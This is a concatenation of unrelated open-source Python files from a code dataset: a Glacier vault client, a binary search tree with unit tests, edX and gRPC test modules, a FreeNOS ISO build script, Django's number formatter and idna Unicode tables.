vault. You will need to wait for the notification from
Amazon (via SNS) before you can actually download the data;
this typically takes around 4 hours.
:type description: str
:param description: An optional description for the job.
:type sns_topic: str
:param sns_topic: The Amazon SNS topic ARN where Amazon Glacier
sends notification when the job is completed and the output
is ready for you to download.
:type byte_range: str
:param byte_range: Range of bytes to retrieve.
:type start_date: DateTime
:param start_date: Beginning of the date range to query.
:type end_date: DateTime
:param end_date: End of the date range to query.
:type limit: int
:param limit: Limits the number of results returned.
:rtype: str
:return: The ID of the job
"""
job_data = {'Type': 'inventory-retrieval'}
if sns_topic is not None:
job_data['SNSTopic'] = sns_topic
if description is not None:
job_data['Description'] = description
if byte_range is not None:
job_data['RetrievalByteRange'] = byte_range
if start_date is not None or end_date is not None or limit is not None:
rparams = {}
if start_date is not None:
rparams['StartDate'] = start_date.strftime('%Y-%m-%dT%H:%M:%S%Z')
if end_date is not None:
rparams['EndDate'] = end_date.strftime('%Y-%m-%dT%H:%M:%S%Z')
if limit is not None:
rparams['Limit'] = limit
job_data['InventoryRetrievalParameters'] = rparams
response = self.layer1.initiate_job(self.name, job_data)
return response['JobId']
def retrieve_inventory_job(self, **kwargs):
"""
Identical to ``retrieve_inventory``, but returns a ``Job`` instance
instead of just the job ID.
:type description: str
:param description: An optional description for the job.
:type sns_topic: str
:param sns_topic: The Amazon SNS topic ARN where Amazon Glacier
sends notification when the job is completed and the output
is ready for you to download.
:type byte_range: str
:param byte_range: Range of bytes to retrieve.
:type start_date: DateTime
:param start_date: Beginning of the date range to query.
:type end_date: DateTime
:param end_date: End of the date range to query.
:type limit: int
:param limit: Limits the number of results returned.
:rtype: :class:`boto.glacier.job.Job`
:return: A Job object representing the retrieval job.
"""
job_id = self.retrieve_inventory(**kwargs)
return self.get_job(job_id)
def delete_archive(self, archive_id):
"""
This operation deletes an archive from the vault.
:type archive_id: str
:param archive_id: The ID for the archive to be deleted.
"""
return self.layer1.delete_archive(self.name, archive_id)
def get_job(self, job_id):
"""
Get an object representing a job in progress.
:type job_id: str
:param job_id: The ID of the job
:rtype: :class:`boto.glacier.job.Job`
:return: A Job object representing the job.
"""
response_data = self.layer1.describe_job(self.name, job_id)
return Job(self, response_data)
def list_jobs(self, completed=None, status_code=None):
"""
Return a list of Job objects related to this vault.
:type completed: boolean
:param completed: Specifies the state of the jobs to return.
If a value of True is passed, only completed jobs will
be returned. If a value of False is passed, only
uncompleted jobs will be returned. If no value is
passed, all jobs will be returned.
:type status_code: string
:param status_code: Specifies the type of job status to return.
Valid values are: InProgress|Succeeded|Failed. If not
specified, jobs with all status codes are returned.
:rtype: list of :class:`boto.glacier.job.Job`
:return: A list of Job objects related to this vault.
"""
response_data = self.layer1.list_jobs(self.name, completed,
status_code)
return [Job(self, jd) for jd in response_data['JobList']]
def list_all_parts(self, upload_id):
"""Automatically make and combine multiple calls to list_parts.
Call list_parts as necessary, combining the results in case multiple
calls were required to get data on all available parts.
"""
result = self.layer1.list_parts(self.name, upload_id)
marker = result['Marker']
while marker:
additional_result = self.layer1.list_parts(
self.name, upload_id, marker=marker)
result['Parts'].extend(additional_result['Parts'])
marker = additional_result['Marker']
# The marker makes no sense in an unpaginated result, and clearing it
# makes testing easier. This also has the nice property that the result
# is a normal (but expanded) response.
result['Marker'] = None
return result
| apache-2.0 |
RanmaRaj/Tak-tivity | pythonds/trees/bst.py | 7 | 18324 | #!/bin/env python3.1
# Bradley N. Miller, David L. Ranum
# Introduction to Data Structures and Algorithms in Python
# Copyright 2005, 2010
#
import unittest
class BinarySearchTree:
'''
Author: Brad Miller
Date: 1/15/2005
Description: Implement a binary search tree with the following interface
functions:
__contains__(y) <==> y in x
__getitem__(y) <==> x[y]
__init__()
__len__() <==> len(x)
__setitem__(k,v) <==> x[k] = v
clear()
get(k)
items()
keys()
values()
put(k,v)
in
del <==>
'''
def __init__(self):
self.root = None
self.size = 0
def put(self,key,val):
if self.root:
self._put(key,val,self.root)
else:
self.root = TreeNode(key,val)
self.size = self.size + 1
def _put(self,key,val,currentNode):
if key < currentNode.key:
if currentNode.hasLeftChild():
self._put(key,val,currentNode.leftChild)
else:
currentNode.leftChild = TreeNode(key,val,parent=currentNode)
else:
if currentNode.hasRightChild():
self._put(key,val,currentNode.rightChild)
else:
currentNode.rightChild = TreeNode(key,val,parent=currentNode)
def __setitem__(self,k,v):
self.put(k,v)
def get(self,key):
if self.root:
res = self._get(key,self.root)
if res:
return res.payload
else:
return None
else:
return None
def _get(self,key,currentNode):
if not currentNode:
return None
elif currentNode.key == key:
return currentNode
elif key < currentNode.key:
return self._get(key,currentNode.leftChild)
else:
return self._get(key,currentNode.rightChild)
def __getitem__(self,key):
res = self.get(key)
if res:
return res
else:
raise KeyError('Error, key not in tree')
def __contains__(self,key):
if self._get(key,self.root):
return True
else:
return False
def length(self):
return self.size
def __len__(self):
return self.size
def __iter__(self):
return self.root.__iter__()
def delete(self,key):
if self.size > 1:
nodeToRemove = self._get(key,self.root)
if nodeToRemove:
self.remove(nodeToRemove)
self.size = self.size-1
else:
raise KeyError('Error, key not in tree')
elif self.size == 1 and self.root.key == key:
self.root = None
self.size = self.size - 1
else:
raise KeyError('Error, key not in tree')
def __delitem__(self,key):
self.delete(key)
# The tests below call delete_key(); keep an alias so they exercise delete().
delete_key = delete
def remove(self,currentNode):
if currentNode.isLeaf(): #leaf
if currentNode == currentNode.parent.leftChild:
currentNode.parent.leftChild = None
else:
currentNode.parent.rightChild = None
elif currentNode.hasBothChildren(): #interior
succ = currentNode.findSuccessor()
succ.spliceOut()
currentNode.key = succ.key
currentNode.payload = succ.payload
else: # this node has one child
if currentNode.hasLeftChild():
if currentNode.isLeftChild():
currentNode.leftChild.parent = currentNode.parent
currentNode.parent.leftChild = currentNode.leftChild
elif currentNode.isRightChild():
currentNode.leftChild.parent = currentNode.parent
currentNode.parent.rightChild = currentNode.leftChild
else:
currentNode.replaceNodeData(currentNode.leftChild.key,
currentNode.leftChild.payload,
currentNode.leftChild.leftChild,
currentNode.leftChild.rightChild)
else:
if currentNode.isLeftChild():
currentNode.rightChild.parent = currentNode.parent
currentNode.parent.leftChild = currentNode.rightChild
elif currentNode.isRightChild():
currentNode.rightChild.parent = currentNode.parent
currentNode.parent.rightChild = currentNode.rightChild
else:
currentNode.replaceNodeData(currentNode.rightChild.key,
currentNode.rightChild.payload,
currentNode.rightChild.leftChild,
currentNode.rightChild.rightChild)
def inorder(self):
self._inorder(self.root)
def _inorder(self,tree):
if tree != None:
self._inorder(tree.leftChild)
print(tree.key)
self._inorder(tree.rightChild)
def postorder(self):
self._postorder(self.root)
def _postorder(self, tree):
if tree:
self._postorder(tree.rightChild)
self._postorder(tree.leftChild)
print(tree.key)
def preorder(self):
self._preorder(self.root)
def _preorder(self,tree):
if tree:
print(tree.key)
self._preorder(tree.leftChild)
self._preorder(tree.rightChild)
class TreeNode:
def __init__(self,key,val,left=None,right=None,parent=None):
self.key = key
self.payload = val
self.leftChild = left
self.rightChild = right
self.parent = parent
self.balanceFactor = 0
def hasLeftChild(self):
return self.leftChild
def hasRightChild(self):
return self.rightChild
def isLeftChild(self):
return self.parent and self.parent.leftChild == self
def isRightChild(self):
return self.parent and self.parent.rightChild == self
def isRoot(self):
return not self.parent
def isLeaf(self):
return not (self.rightChild or self.leftChild)
def hasAnyChildren(self):
return self.rightChild or self.leftChild
def hasBothChildren(self):
return self.rightChild and self.leftChild
def replaceNodeData(self,key,value,lc,rc):
self.key = key
self.payload = value
self.leftChild = lc
self.rightChild = rc
if self.hasLeftChild():
self.leftChild.parent = self
if self.hasRightChild():
self.rightChild.parent = self
def findSuccessor(self):
succ = None
if self.hasRightChild():
succ = self.rightChild.findMin()
else:
if self.parent:
if self.isLeftChild():
succ = self.parent
else:
self.parent.rightChild = None
succ = self.parent.findSuccessor()
self.parent.rightChild = self
return succ
def spliceOut(self):
if self.isLeaf():
if self.isLeftChild():
self.parent.leftChild = None
else:
self.parent.rightChild = None
elif self.hasAnyChildren():
if self.hasLeftChild():
if self.isLeftChild():
self.parent.leftChild = self.leftChild
else:
self.parent.rightChild = self.leftChild
self.leftChild.parent = self.parent
else:
if self.isLeftChild():
self.parent.leftChild = self.rightChild
else:
self.parent.rightChild = self.rightChild
self.rightChild.parent = self.parent
def findMin(self):
current = self
while current.hasLeftChild():
current = current.leftChild
return current
def __iter__(self):
"""The standard inorder traversal of a binary tree."""
if self:
if self.hasLeftChild():
for elem in self.leftChild:
yield elem
yield self.key
if self.hasRightChild():
for elem in self.rightChild:
yield elem
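# Editor's illustrative sketch (not part of the original module): minimal use
# of the BinarySearchTree mapping interface defined above. Keys and values
# are arbitrary examples.
def _example_bst_usage():
    tree = BinarySearchTree()
    tree[17] = 'seventeen'            # __setitem__ -> put()
    tree[5] = 'five'
    tree[35] = 'thirty-five'
    assert 5 in tree                  # __contains__ -> _get()
    assert tree[17] == 'seventeen'    # __getitem__ -> get()
    assert [k for k in tree] == [5, 17, 35]   # inorder iteration yields sorted keys
    del tree[5]                       # __delitem__ -> delete()
    assert len(tree) == 2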
class BinaryTreeTests(unittest.TestCase):
def setUp(self):
self.bst = BinarySearchTree()
def testgetput(self):
print('testgetput')
self.bst.put(50,'a')
self.bst.put(10,'b')
self.bst.put(70,'c')
self.bst.put(30,'d')
self.bst.put(85,'d')
self.bst.put(15,'e')
self.bst.put(45,'f')
print(self.bst.get(50))
assert self.bst.get(50) == 'a'
assert self.bst.get(45) == 'f'
assert self.bst.get(85) == 'd'
assert self.bst.get(10) == 'b'
assert self.bst.root.key == 50
assert self.bst.root.leftChild.key == 10
assert self.bst.root.rightChild.key == 70
def testputoper(self):
print('testputoper')
self.bst[25] = 'g'
assert self.bst[25] == 'g'
def testFindSucc(self):
print('testing findSucc')
x = BinarySearchTree()
x.put(10,'a')
x.put(15,'b')
x.put(6,'c')
x.put(2,'d')
x.put(8,'e')
x.put(9,'f')
assert x.root.leftChild.leftChild.findSuccessor().key == 6
assert x.root.leftChild.rightChild.findSuccessor().key == 9
assert x.root.leftChild.rightChild.rightChild.findSuccessor().key == 10
def testSize(self):
print('testing testSize')
self.bst.put(50,'a')
self.bst.put(10,'b')
self.bst.put(70,'c')
self.bst.put(30,'d')
self.bst.put(85,'d')
self.bst.put(15,'e')
self.bst.put(45,'f')
assert self.bst.length() == 7
def testDelete(self):
print('testing delete')
self.bst.put(50,'a')
self.bst.put(10,'b')
self.bst.put(70,'c')
self.bst.put(30,'d')
self.bst.put(85,'d')
self.bst.put(15,'e')
self.bst.put(45,'f')
self.bst.put(5,'g')
print('initial inorder')
self.bst.inorder()
assert (10 in self.bst) == True
self.bst.delete_key(10)
print('delete 10 inorder')
self.bst.inorder()
assert (10 in self.bst) == False
assert self.bst.root.leftChild.key == 15
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.leftChild.rightChild.parent == self.bst.root.leftChild
assert self.bst.get(30) == 'd'
self.bst.delete_key(15)
print('delete 15 inorder')
self.bst.inorder()
assert self.bst.root.leftChild.key == 30
assert self.bst.root.leftChild.rightChild.key == 45
assert self.bst.root.leftChild.rightChild.parent == self.bst.root.leftChild
self.bst.delete_key(70)
print('delete 70 inorder')
self.bst.inorder()
assert (85 in self.bst) == True
assert self.bst.get(30) == 'd'
print('root key = ', self.bst.root.key)
print('left = ',self.bst.root.leftChild.key)
print('left left = ',self.bst.root.leftChild.leftChild.key)
print('left right = ',self.bst.root.leftChild.rightChild.key)
print('right = ',self.bst.root.rightChild.key)
self.bst.delete_key(50)
assert self.bst.root.key == 85
assert self.bst.root.leftChild.key == 30
assert self.bst.root.rightChild == None
assert self.bst.root.leftChild.leftChild.key == 5
assert self.bst.root.leftChild.rightChild.key == 45
assert self.bst.root.leftChild.leftChild.parent == self.bst.root.leftChild
assert self.bst.root.leftChild.rightChild.parent == self.bst.root.leftChild
print('new root key = ', self.bst.root.key)
self.bst.inorder()
self.bst.delete_key(45)
assert self.bst.root.leftChild.key == 30
self.bst.delete_key(85)
assert self.bst.root.key == 30
print('xxxx ',self.bst.root.leftChild.parent.key, self.bst.root.key)
assert self.bst.root.leftChild.parent == self.bst.root
self.bst.delete_key(30)
assert self.bst.root.key == 5
self.bst.inorder()
print("final root = " + str(self.bst.root.key))
assert self.bst.root.key == 5
self.bst.delete_key(5)
assert self.bst.root == None
def testDel2(self):
self.bst.put(21,'a')
self.bst.put(10,'b')
self.bst.put(24,'c')
self.bst.put(11,'d')
self.bst.put(22,'d')
self.bst.delete_key(10)
assert self.bst.root.leftChild.key == 11
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.rightChild.key == 24
self.bst.delete_key(24)
assert self.bst.root.rightChild.key == 22
assert self.bst.root.rightChild.parent == self.bst.root
self.bst.delete_key(22)
self.bst.delete_key(21)
print("del2 root = ",self.bst.root.key)
assert self.bst.root.key == 11
assert self.bst.root.leftChild == None
assert self.bst.root.rightChild == None
def testLarge(self):
import random
print('testing a large random tree')
i = 0
randList = []
while i < 10000:
nrand = random.randrange(1,10000000)
if nrand not in randList:
randList.append(nrand)
i += 1
print(randList)
for n in randList:
self.bst.put(n,n)
sortList = randList[:]
sortList.sort()
random.shuffle(randList)
for n in randList:
minNode = self.bst.root.findMin()
if minNode:
assert minNode.key == sortList[0]
rootPos = sortList.index(self.bst.root.key)
succ = self.bst.root.findSuccessor()
if succ:
assert succ.key == sortList[rootPos+1]
else:
assert self.bst.root.rightChild == None
self.bst.delete_key(n)
sortList.remove(n)
assert self.bst.root == None
def testIter(self):
import random
i = 0
randList = []
while i < 100:
nrand = random.randrange(1,10000)
if nrand not in randList:
randList.append(nrand)
i += 1
for n in randList:
self.bst.put(n,n)
sortList = randList[:]
sortList.sort()
i = 0
for j in self.bst:
assert j == sortList[i]
i += 1
# the following exercises all of the branches in deleting a node with one child
def testCase1(self):
self.bst.put(10,10)
self.bst.put(7,7)
self.bst.put(5,5)
self.bst.put(1,1)
self.bst.put(6,6)
self.bst.delete_key(7)
assert self.bst.root.leftChild.key == 5
assert self.bst.root == self.bst.root.leftChild.parent
assert self.bst.root.leftChild.leftChild.key == 1
assert self.bst.root.leftChild.rightChild.key == 6
def testCase2(self):
self.bst = BinarySearchTree()
self.bst.put(10,10)
self.bst.put(15,15)
self.bst.put(12,12)
self.bst.put(11,11)
self.bst.put(13,13)
self.bst.delete_key(15)
assert self.bst.root.rightChild.key == 12
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.rightChild.leftChild.key == 11
assert self.bst.root.rightChild.rightChild.key == 13
def testCase3(self):
self.bst = BinarySearchTree()
self.bst.put(10,10)
self.bst.put(6,6)
self.bst.put(8,8)
self.bst.put(7,7)
self.bst.put(9,9)
self.bst.delete_key(6)
assert self.bst.root.leftChild.key == 8
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.leftChild.leftChild.key == 7
assert self.bst.root.leftChild.rightChild.key == 9
def testCase4(self):
self.bst = BinarySearchTree()
self.bst.put(10,10)
self.bst.put(15,15)
self.bst.put(20,20)
self.bst.put(17,17)
self.bst.put(22,22)
self.bst.delete_key(15)
assert self.bst.root.rightChild.key == 20
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.rightChild.rightChild.key == 22
assert self.bst.root.rightChild.leftChild.key == 17
def testCase5(self):
self.bst.put(10,10)
self.bst.put(20,20)
self.bst.put(17,17)
self.bst.put(22,22)
self.bst.delete_key(10)
assert self.bst.root.key == 20
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.leftChild.key == 17
assert self.bst.root.rightChild.key == 22
def testCase6(self):
self.bst.put(10,10)
self.bst.put(5,5)
self.bst.put(1,1)
self.bst.put(7,7)
self.bst.delete_key(10)
assert self.bst.root.key == 5
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.leftChild.key == 1
assert self.bst.root.rightChild.key == 7
def testBadDelete(self):
self.bst.put(10,10)
with self.assertRaises(KeyError):
self.bst.delete_key(5)
self.bst.delete_key(10)
with self.assertRaises(KeyError):
self.bst.delete_key(5)
if __name__ == '__main__':
import platform
print(platform.python_version())
unittest.main()
### Local Variables:
### End:
| apache-2.0 |
marcore/edx-platform | common/djangoapps/microsite_configuration/tests/test_admin.py | 46 | 1635 | """
Tests for microsite admin
"""
from django.contrib.admin.sites import AdminSite
from django.http import HttpRequest
from microsite_configuration.admin import MicrositeAdmin
from microsite_configuration.models import Microsite
from microsite_configuration.tests.tests import DatabaseMicrositeTestCase
class MicrositeAdminTests(DatabaseMicrositeTestCase):
"""
Test class for MicrositeAdmin
"""
def setUp(self):
super(MicrositeAdminTests, self).setUp()
self.adminsite = AdminSite()
self.microsite_admin = MicrositeAdmin(Microsite, self.adminsite)
self.request = HttpRequest()
def test_fields_in_admin_form(self):
"""
Tests presence of form fields for Microsite.
"""
microsite_form = self.microsite_admin.get_form(self.request, self.microsite)
self.assertEqual(
list(microsite_form.base_fields),
["site", "key", "values"]
)
def test_save_action_admin_form(self):
"""
Tests save action for Microsite model form.
"""
new_values = {
"domain_prefix": "test-site-new",
"platform_name": "Test Site New"
}
microsite_form = self.microsite_admin.get_form(self.request)(instance=self.microsite, data={
"key": self.microsite.key,
"site": self.microsite.site.id,
"values": new_values,
})
self.assertTrue(microsite_form.is_valid())
microsite_form.save()
new_microsite = Microsite.objects.get(key=self.microsite.key)
self.assertEqual(new_microsite.values, new_values)
| agpl-3.0 |
stanley-cheung/grpc | src/python/grpcio_tests/tests/unit/_server_shutdown_scenarios.py | 18 | 2916 | # Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a number of module-scope gRPC scenarios to test server shutdown."""
import argparse
import os
import threading
import time
import logging
import grpc
from tests.unit import test_common
from concurrent import futures
from six.moves import queue
WAIT_TIME = 1000
REQUEST = b'request'
RESPONSE = b'response'
SERVER_RAISES_EXCEPTION = 'server_raises_exception'
SERVER_DEALLOCATED = 'server_deallocated'
SERVER_FORK_CAN_EXIT = 'server_fork_can_exit'
FORK_EXIT = '/test/ForkExit'
def fork_and_exit(request, servicer_context):
pid = os.fork()
if pid == 0:
os._exit(0)
return RESPONSE
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == FORK_EXIT:
return grpc.unary_unary_rpc_method_handler(fork_and_exit)
else:
return None
def run_server(port_queue):
server = test_common.test_server()
port = server.add_insecure_port('[::]:0')
port_queue.put(port)
server.add_generic_rpc_handlers((GenericHandler(),))
server.start()
# threading.Event.wait() does not exhibit the bug identified in
# https://github.com/grpc/grpc/issues/17093, sleep instead
time.sleep(WAIT_TIME)
def run_test(args):
if args.scenario == SERVER_RAISES_EXCEPTION:
server = test_common.test_server()
server.start()
raise Exception()
elif args.scenario == SERVER_DEALLOCATED:
server = test_common.test_server()
server.start()
server.__del__()
while server._state.stage != grpc._server._ServerStage.STOPPED:
pass
elif args.scenario == SERVER_FORK_CAN_EXIT:
port_queue = queue.Queue()
thread = threading.Thread(target=run_server, args=(port_queue,))
thread.daemon = True
thread.start()
port = port_queue.get()
channel = grpc.insecure_channel('localhost:%d' % port)
multi_callable = channel.unary_unary(FORK_EXIT)
result, call = multi_callable.with_call(REQUEST, wait_for_ready=True)
os.wait()
else:
raise ValueError('unknown test scenario')
if __name__ == '__main__':
logging.basicConfig()
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
args = parser.parse_args()
run_test(args)
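# Editor's illustrative note: this module is designed to be launched as a
# subprocess by the shutdown test suite, passing one of the scenario constants
# defined above as the single positional argument, e.g.:
#
#     python _server_shutdown_scenarios.py server_deallocated
#
# The exact invocation used by the harness may differ; this is only a sketch.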
| apache-2.0 |
zpfang/FreeNOS | site_scons/iso.py | 3 | 1803 | #
# Copyright (C) 2010 Niek Linnenbank
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import tempfile
import shutil
#
# Generate a bootable ISO image.
#
def iso_func(target, source, env):
# Create a temporary directory.
temp = tempfile.mkdtemp()
# Copy required files to temp directory.
for s in source:
shutil.copy(str(s), temp)
# Temporary workaround for x86/pc. Place grub menu.lst in /boot/grub.
os.makedirs(temp + '/boot/grub')
shutil.copy('kernel/x86/pc/menu.lst', temp + '/boot/grub')
# Generate the ISO.
os.system('mkisofs -quiet -R -b stage2_eltorito -no-emul-boot ' +
'-boot-load-size 4 -boot-info-table -o ' + str(target[0]) +
' -V "FreeNOS ' + env['RELEASE'] + '" ' + temp);
# Clean up temporary directory.
shutil.rmtree(temp);
#
# String command representation for ISO builder.
#
def iso_str(target, source, env):
return " ISO " + str(target[0])
#
# Add ourselves to the given environment.
#
def generate(env):
builder = env.Builder(action = env.Action(iso_func, iso_str))
env.Append(BUILDERS = { 'ISO' : builder })
#
# We always exist.
#
def exists(env):
return env.Detect('mkisofs')
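# Editor's illustrative sketch: how the builder registered by generate() above
# is typically consumed from an SConstruct (target and source names are
# hypothetical):
#
#     env = Environment(tools=['default', 'iso'], toolpath=['site_scons'])
#     env.ISO('FreeNOS.iso', ['boot/stage2_eltorito', 'kernel/kernel'])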
| gpl-3.0 |
holmes/intellij-community | python/lib/Lib/site-packages/django/utils/numberformat.py | 290 | 1632 | from django.conf import settings
from django.utils.safestring import mark_safe
def format(number, decimal_sep, decimal_pos, grouping=0, thousand_sep=''):
"""
Gets a number (as a number or string), and returns it as a string,
using formats defined as arguments:
* decimal_sep: Decimal separator symbol (for example ".")
* decimal_pos: Number of decimal positions
* grouping: Number of digits in every group limited by thousand separator
* thousand_sep: Thousand separator symbol (for example ",")
"""
use_grouping = settings.USE_L10N and \
settings.USE_THOUSAND_SEPARATOR and grouping
# Make the common case fast:
if isinstance(number, int) and not use_grouping and not decimal_pos:
return mark_safe(unicode(number))
# sign
if float(number) < 0:
sign = '-'
else:
sign = ''
str_number = unicode(number)
if str_number[0] == '-':
str_number = str_number[1:]
# decimal part
if '.' in str_number:
int_part, dec_part = str_number.split('.')
if decimal_pos:
dec_part = dec_part[:decimal_pos]
else:
int_part, dec_part = str_number, ''
if decimal_pos:
dec_part = dec_part + ('0' * (decimal_pos - len(dec_part)))
if dec_part: dec_part = decimal_sep + dec_part
# grouping
if use_grouping:
int_part_gd = ''
for cnt, digit in enumerate(int_part[::-1]):
if cnt and not cnt % grouping:
int_part_gd += thousand_sep
int_part_gd += digit
int_part = int_part_gd[::-1]
return sign + int_part + dec_part
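# Editor's illustrative example of the function above (values are arbitrary;
# grouping and the thousand separator only apply when settings.USE_L10N and
# settings.USE_THOUSAND_SEPARATOR are both enabled):
#
#     format(1234567.891, '.', decimal_pos=2, grouping=3, thousand_sep=',')
#     # -> '1,234,567.89' with localized grouping enabled,
#     #    '1234567.89' otherwise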
| apache-2.0 |
gimite/personfinder | app/vendors/idna/idnadata.py | 63 | 40899 | # This file is automatically generated by tools/idna-data
__version__ = "11.0.0"
scripts = {
'Greek': (
0x37000000374,
0x37500000378,
0x37a0000037e,
0x37f00000380,
0x38400000385,
0x38600000387,
0x3880000038b,
0x38c0000038d,
0x38e000003a2,
0x3a3000003e2,
0x3f000000400,
0x1d2600001d2b,
0x1d5d00001d62,
0x1d6600001d6b,
0x1dbf00001dc0,
0x1f0000001f16,
0x1f1800001f1e,
0x1f2000001f46,
0x1f4800001f4e,
0x1f5000001f58,
0x1f5900001f5a,
0x1f5b00001f5c,
0x1f5d00001f5e,
0x1f5f00001f7e,
0x1f8000001fb5,
0x1fb600001fc5,
0x1fc600001fd4,
0x1fd600001fdc,
0x1fdd00001ff0,
0x1ff200001ff5,
0x1ff600001fff,
0x212600002127,
0xab650000ab66,
0x101400001018f,
0x101a0000101a1,
0x1d2000001d246,
),
'Han': (
0x2e8000002e9a,
0x2e9b00002ef4,
0x2f0000002fd6,
0x300500003006,
0x300700003008,
0x30210000302a,
0x30380000303c,
0x340000004db6,
0x4e0000009ff0,
0xf9000000fa6e,
0xfa700000fada,
0x200000002a6d7,
0x2a7000002b735,
0x2b7400002b81e,
0x2b8200002cea2,
0x2ceb00002ebe1,
0x2f8000002fa1e,
),
'Hebrew': (
0x591000005c8,
0x5d0000005eb,
0x5ef000005f5,
0xfb1d0000fb37,
0xfb380000fb3d,
0xfb3e0000fb3f,
0xfb400000fb42,
0xfb430000fb45,
0xfb460000fb50,
),
'Hiragana': (
0x304100003097,
0x309d000030a0,
0x1b0010001b11f,
0x1f2000001f201,
),
'Katakana': (
0x30a1000030fb,
0x30fd00003100,
0x31f000003200,
0x32d0000032ff,
0x330000003358,
0xff660000ff70,
0xff710000ff9e,
0x1b0000001b001,
),
}
joining_types = {
0x600: 85,
0x601: 85,
0x602: 85,
0x603: 85,
0x604: 85,
0x605: 85,
0x608: 85,
0x60b: 85,
0x620: 68,
0x621: 85,
0x622: 82,
0x623: 82,
0x624: 82,
0x625: 82,
0x626: 68,
0x627: 82,
0x628: 68,
0x629: 82,
0x62a: 68,
0x62b: 68,
0x62c: 68,
0x62d: 68,
0x62e: 68,
0x62f: 82,
0x630: 82,
0x631: 82,
0x632: 82,
0x633: 68,
0x634: 68,
0x635: 68,
0x636: 68,
0x637: 68,
0x638: 68,
0x639: 68,
0x63a: 68,
0x63b: 68,
0x63c: 68,
0x63d: 68,
0x63e: 68,
0x63f: 68,
0x640: 67,
0x641: 68,
0x642: 68,
0x643: 68,
0x644: 68,
0x645: 68,
0x646: 68,
0x647: 68,
0x648: 82,
0x649: 68,
0x64a: 68,
0x66e: 68,
0x66f: 68,
0x671: 82,
0x672: 82,
0x673: 82,
0x674: 85,
0x675: 82,
0x676: 82,
0x677: 82,
0x678: 68,
0x679: 68,
0x67a: 68,
0x67b: 68,
0x67c: 68,
0x67d: 68,
0x67e: 68,
0x67f: 68,
0x680: 68,
0x681: 68,
0x682: 68,
0x683: 68,
0x684: 68,
0x685: 68,
0x686: 68,
0x687: 68,
0x688: 82,
0x689: 82,
0x68a: 82,
0x68b: 82,
0x68c: 82,
0x68d: 82,
0x68e: 82,
0x68f: 82,
0x690: 82,
0x691: 82,
0x692: 82,
0x693: 82,
0x694: 82,
0x695: 82,
0x696: 82,
0x697: 82,
0x698: 82,
0x699: 82,
0x69a: 68,
0x69b: 68,
0x69c: 68,
0x69d: 68,
0x69e: 68,
0x69f: 68,
0x6a0: 68,
0x6a1: 68,
0x6a2: 68,
0x6a3: 68,
0x6a4: 68,
0x6a5: 68,
0x6a6: 68,
0x6a7: 68,
0x6a8: 68,
0x6a9: 68,
0x6aa: 68,
0x6ab: 68,
0x6ac: 68,
0x6ad: 68,
0x6ae: 68,
0x6af: 68,
0x6b0: 68,
0x6b1: 68,
0x6b2: 68,
0x6b3: 68,
0x6b4: 68,
0x6b5: 68,
0x6b6: 68,
0x6b7: 68,
0x6b8: 68,
0x6b9: 68,
0x6ba: 68,
0x6bb: 68,
0x6bc: 68,
0x6bd: 68,
0x6be: 68,
0x6bf: 68,
0x6c0: 82,
0x6c1: 68,
0x6c2: 68,
0x6c3: 82,
0x6c4: 82,
0x6c5: 82,
0x6c6: 82,
0x6c7: 82,
0x6c8: 82,
0x6c9: 82,
0x6ca: 82,
0x6cb: 82,
0x6cc: 68,
0x6cd: 82,
0x6ce: 68,
0x6cf: 82,
0x6d0: 68,
0x6d1: 68,
0x6d2: 82,
0x6d3: 82,
0x6d5: 82,
0x6dd: 85,
0x6ee: 82,
0x6ef: 82,
0x6fa: 68,
0x6fb: 68,
0x6fc: 68,
0x6ff: 68,
0x70f: 84,
0x710: 82,
0x712: 68,
0x713: 68,
0x714: 68,
0x715: 82,
0x716: 82,
0x717: 82,
0x718: 82,
0x719: 82,
0x71a: 68,
0x71b: 68,
0x71c: 68,
0x71d: 68,
0x71e: 82,
0x71f: 68,
0x720: 68,
0x721: 68,
0x722: 68,
0x723: 68,
0x724: 68,
0x725: 68,
0x726: 68,
0x727: 68,
0x728: 82,
0x729: 68,
0x72a: 82,
0x72b: 68,
0x72c: 82,
0x72d: 68,
0x72e: 68,
0x72f: 82,
0x74d: 82,
0x74e: 68,
0x74f: 68,
0x750: 68,
0x751: 68,
0x752: 68,
0x753: 68,
0x754: 68,
0x755: 68,
0x756: 68,
0x757: 68,
0x758: 68,
0x759: 82,
0x75a: 82,
0x75b: 82,
0x75c: 68,
0x75d: 68,
0x75e: 68,
0x75f: 68,
0x760: 68,
0x761: 68,
0x762: 68,
0x763: 68,
0x764: 68,
0x765: 68,
0x766: 68,
0x767: 68,
0x768: 68,
0x769: 68,
0x76a: 68,
0x76b: 82,
0x76c: 82,
0x76d: 68,
0x76e: 68,
0x76f: 68,
0x770: 68,
0x771: 82,
0x772: 68,
0x773: 82,
0x774: 82,
0x775: 68,
0x776: 68,
0x777: 68,
0x778: 82,
0x779: 82,
0x77a: 68,
0x77b: 68,
0x77c: 68,
0x77d: 68,
0x77e: 68,
0x77f: 68,
0x7ca: 68,
0x7cb: 68,
0x7cc: 68,
0x7cd: 68,
0x7ce: 68,
0x7cf: 68,
0x7d0: 68,
0x7d1: 68,
0x7d2: 68,
0x7d3: 68,
